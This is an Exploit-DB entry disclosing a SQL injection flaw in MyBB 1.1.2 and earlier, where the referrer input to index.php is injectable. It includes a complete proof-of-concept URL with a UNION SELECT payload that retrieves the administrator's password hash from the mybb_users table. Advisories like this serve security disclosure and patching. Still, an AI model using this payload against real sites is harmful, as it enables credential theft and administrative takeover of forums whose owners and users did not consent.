MyBB 1.0/1.1 Index.PHP Referrer Cookie SQL Injection Vulnerability

2006-01-31T00:00:00
ID EDB-ID:27155
Type exploitdb
Reporter Devil-00
Modified 2006-01-31T00:00:00

Description

MyBB 1.0/1.1 Index.PHP Referrer Cookie SQL Injection Vulnerability. CVE-2006-1974. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/16443/info

MyBB is prone to an SQL-injection vulnerability.

The vulnerability presents itself when user-supplied input via cookie data is passed to the 'index.php' script.

Successful exploitation can allow an attacker to bypass authentication and gain administrative access to a site. Other attacks may also be possible.

MyBB 1.1.2 and prior versions are reported vulnerable to this issue. 

http://www.example.com/index.php?referrer=9999999999'%20UNION%20SELECT%20password,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,
9,0,1,2,3,4,5,6,7,8,9%20FROM%20mybb_users%20WHERE%20uid=1/*